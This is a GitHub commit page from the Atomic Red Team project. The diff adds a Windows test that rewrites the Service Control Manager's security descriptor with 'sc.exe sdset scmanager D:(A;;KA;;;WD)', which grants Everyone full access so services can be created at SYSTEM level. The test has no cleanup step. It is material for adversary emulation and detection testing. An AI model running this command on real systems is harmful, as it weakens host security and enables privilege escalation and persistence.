Update T1569.002.yaml (#2776)

* Update T1569.002.yaml Added new test Modifying ACL of Service Control Manager via SDET * correction --------- Co-authored-by: Carrie Roberts <clr2of8@gmail.com> Co-authored-by: Hare Sudhan <code@0x6c.dev>
redcanaryco · May 15, 2024 · efa3370 · efa3370
1 parent 7bf6eaa
commit efa3370
Showing 1 changed file with 12 additions and 1 deletion.
diff --git a/atomics/T1569.002/T1569.002.yaml b/atomics/T1569.002/T1569.002.yaml
@@ -194,4 +194,15 @@ atomic_tests:
     cleanup_command: |
       sc.exe delete "WerFaultSvc"
     name: command_prompt
-    elevation_required: true
+    elevation_required: true
+- name: Modifying ACL of Service Control Manager via SDET
+  description: |
+    Modify permissions of Service Control Manager via SDSET. This allows any administrative user to escalate privilege and create a service with SYSTEM level privileges.Restart is required.
+    [Blog](https://0xv1n.github.io/posts/scmanager/)  
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      sc.exe sdset scmanager D:(A;;KA;;;WD)
+    name: command_prompt
+    elevation_required: true